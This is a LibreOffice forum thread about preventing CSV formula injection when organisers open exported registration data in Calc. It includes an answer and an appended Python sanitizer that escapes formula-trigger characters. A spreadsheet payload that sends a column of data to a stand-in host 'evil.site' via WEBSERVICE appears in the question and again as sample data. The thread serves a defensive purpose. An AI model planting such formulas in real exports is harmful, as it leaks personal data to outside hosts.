0

Default format quoted text from csv as text.

asked 2020-05-03 15:37:47 +0200

jklaassen

updated 2020-05-04 01:52:41 +0200

We have a web application, the backend of which allows batch downloading csvs with e.g. data of the people registered on our site.

When these csvs are opened in libreoffice calc, we would preferably not have data in the csv be interpreted as formulas, as this might leak data from the spreadsheet to unknown sources (For example if someone wrote =WEBSERVICE(CONCAT("evil.site/logger.php?data=",U2:U3000)) in one of the cells, the data in column U will be leaked to evil.site. If multiple such entries are entered for different columns, we have a big problem.)

Indeed one does get a message saying "Confirmation This file contains links to other files. Should they be updated?", where clicking no will not leak the data. However, our backend users might very well click yes sometimes, as I cannot tell all our current and future backend users to watch out for this button.

This problem is easily avoided with the Format quoted field as text button in the Text Import window. However, if a backend user has opened a different csv with this option disabled, the next time he/she opens a sensitive csv, this option is turned off. Is it possible to have this option _always_ turned on, i.e. that the end user _always_ has to willingly make the insecure decision himself?

EDIT: thank you for your reply. So to be clear: we have front end users ('customers') and back end users ('organisers') and the organisers can download csvs with the info that the customers have filled in in the registration form on the front end. The malicious code gets inserted if an evil customer fills it in in one of the fields on the online form. Now for the organisers to do what they want to do with the data, it is convenient to have it all in one manageable file that can be opened by several applications of the organisers' choice, e.g. vim, less, gedit, geany, libreoffice, Google Sheets (although I would rather not have Google know all our data) etc. I would rather not dictate that our organisers use libreoffice or a similar program that can handle ods files, I myself prefer gedit. However if the organisers choose to open the csv with libreoffice (and most of them do), I would like it if the safe option ( force all fields to type text ) is the default, such that I do not have to explain that they should watch this one button on the import screen. It would be better if the button would always default to the safe option, instead of remembering the previous setting, and I am asking how to make libreoffice default to this (clearly safer) setting.

So I am not asking if it is possible to handle the csv safely despite this setting being unsafe, I am asking how I can make the libreoffice application use the safe option per default (at least on the organisers' machines, where I ... (plus)


1 Answer

0

answered 2020-05-03 23:07:39 +0200

erAck

updated 2020-05-04 02:40:52 +0200

Are you saying that your web application could generate such malicious formula expression into the CSV that users can download or is this just a hypothetical made-up problem?

Anyway, this cannot be prevented in CSV if the field is not forced to type text. You'd be better off if your process did not hand out CSV files but ODF .ods spreadsheet documents. You could even convert a CSV to .ods on the server side using LibreOffice (or unoconv) with proper column import settings and hand the .ods out as download.

Update 2020-05-04T02:40+02:00

The best probably would be to preprocess the CSV or even the data it is generated from and escape formula expressions that start with a = (equal) character by inserting any other character in front, by convention, if allowed data permits and shouldn't start with a = character.

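The server-side preprocessing the answer suggests, written out as an added example (not code from the question or from LibreOffice): every exported field that would be parsed as a formula gets a leading apostrophe, and all fields are quoted so the "Format quoted field as text" import option also applies. The page only names `=`; the `+`, `-`, `@`, tab and CR triggers are added here from general CSV-injection hardening practice, and the sample rows are constructed.

```python
import csv
import io

# Leading characters that make LibreOffice Calc (and Excel) treat a field as
# a formula. The question mentions only '='; the others are added from
# general CSV-injection practice. Note that '-' also catches legitimate
# negative numbers, so exempt purely numeric columns if you export any.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_field(value: str) -> str:
    """Neutralise a field that would otherwise be parsed as a formula.

    A leading apostrophe is the conventional escape: Calc then stores the
    cell as literal text. Leading whitespace is stripped first so that
    " =1+1" cannot slip past the check.
    """
    stripped = value.lstrip()
    if stripped.startswith(FORMULA_TRIGGERS):
        return "'" + stripped
    return value


def write_safe_csv(rows, fieldnames):
    """Serialise rows to CSV text with every field sanitised and quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(
        buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n"
    )
    writer.writeheader()
    for row in rows:
        writer.writerow({k: sanitize_field(str(row.get(k, ""))) for k in fieldnames})
    return buf.getvalue()


# Constructed sample: one benign registration and one hostile one carrying
# the kind of WEBSERVICE payload described in the question.
SAMPLE_ROWS = [
    {"name": "Alice Example", "email": "alice@example.org"},
    {"name": '=WEBSERVICE(CONCAT("evil.site/logger.php?data=",U2:U3000))',
     "email": "-1+1"},
]

if __name__ == "__main__":
    print(write_safe_csv(SAMPLE_ROWS, ["name", "email"]))
```

The escaped field survives a round trip through `csv.reader` unchanged, and the apostrophe is visible in vim or gedit, so organisers can see which entries were neutralised.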